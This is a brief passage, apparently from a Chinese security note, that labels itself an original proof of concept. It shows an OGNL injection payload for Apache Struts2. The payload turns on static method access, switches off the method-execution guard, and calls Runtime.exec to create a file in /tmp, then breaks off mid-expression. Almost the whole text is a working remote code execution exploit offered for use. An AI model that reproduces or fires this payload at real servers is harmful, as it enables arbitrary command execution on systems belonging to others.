原始POC,分行显示,易于理解 ('#_memberAccess[\'allowStaticMethodAccess\']')(vaaa)=true& (aaaa)(('#context[\'xwork.MethodAccessor.denyMethodExecution\']=#vccc')(#vccc=new java.lang.Boolean(false)))& (asdf)(('#rt.exec(touch@/tmp/success.split(@))')(#rt=@java.lang.Runtime@getRunti...